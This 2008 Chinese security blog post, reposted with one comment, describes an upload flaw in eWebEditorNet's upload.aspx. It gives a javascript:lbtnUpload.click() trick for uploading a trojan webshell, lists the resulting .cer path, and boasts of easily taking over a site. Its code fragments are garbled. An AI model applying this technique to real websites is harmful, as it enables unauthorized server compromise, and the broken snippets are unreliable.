eWebEditorNet 漏洞 upload.aspx

    [多云 September 2, 2008 21:51 | by !4p47hy ]
来源:坏狼安全网
eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞
原理:

代码
<form id="post" encType="server">    
"uploadfile" style="file" size="uploadfile" runat=
"lbtnUpload" runat=
"JavaScript">

只是简单的对ID进行验证,只要构造javascript:lbtnUpload.click();满足条件达到上传木马的效果。成功以后查看源代码
代码
a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>

木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。
Bug&Exp | Comments(1) | Trackbacks(0) | Reads(8765)
arthack Homepage
September 2, 2008 23:33
嘿嘿……又有人玩了
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive